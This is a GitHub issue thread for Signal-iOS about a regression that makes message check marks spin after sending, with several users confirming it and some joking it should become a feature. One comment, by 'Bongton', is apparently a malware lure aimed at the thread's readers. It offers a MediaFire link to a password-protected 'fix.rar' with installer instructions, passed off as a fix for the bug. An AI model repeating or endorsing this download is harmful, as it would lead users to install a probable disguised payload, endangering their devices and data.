### ISSUE TITLE
Spinning check marks bug is back (regression)

### ISSUE THREAD

**Issue by valynor** [signalapp/Signal-iOS#5858]
Signal 7.25, iOS 17.6.1, iPhone 13 Pro Max

The spinning check marks/read marks bug as shown in this video is back: 
https://www.reddit.com/r/signal/comments/1c54r6x/weird_signal_check_marks_are_spinning_around/

Appears right after you sent a message to someone and go back to the list of Signal contacts. 
Disappears after app termination/restart.

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by LunarN0v4** [comment]
Honestly, I feel like this bug should be a feature, like add a switch into the app settings to enable it.  
I'm speaking on behalf of me and a few friends.

**Comment by metcalfeakj** [comment]
![image](https://github.com/user-attachments/assets/8d99fe1e-0cd9-4077-b3b6-9993707367af)
I like it. Let’s make it a cosmetic option.

**Comment by lorenzo9uerra** [comment]
I confirm
https://github.com/user-attachments/assets/fee803dd-0a59-4280-a140-ddff1c9e4d46

**Comment by rcnza** [comment]
I can also confirm its back, and its very distracting.  I now have to kill the app after every message sent to not have that.

**Comment by Melaron** [comment]
Confirmed – spinning check marks after sending a message to individual via DM.
